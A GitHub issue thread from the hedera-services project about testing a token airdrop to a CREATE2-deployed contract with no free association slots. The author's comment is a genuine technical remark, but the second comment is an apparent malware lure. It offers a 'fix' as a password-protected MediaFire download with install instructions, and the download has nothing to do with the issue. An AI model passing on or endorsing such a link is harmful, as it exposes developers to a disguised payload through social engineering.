### ISSUE TITLE
(AIRDROP_TO_CONTRACT_10) EOA account airdrops a single token to an contract, deployed via CREATE2 on a hollow account addres alias (the contract won’t have any free auto association slots) for FT

### ISSUE THREAD

**Issue by vtronkov** [hashgraph/hedera-services#15277]

**Comment by vtronkov** [comment]
This cannot be verified because when we do the second airdrop we will just have another successful airdrop and won't be able to see if there is a previous one. This can be tested once the contracts can claim an airdrop

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
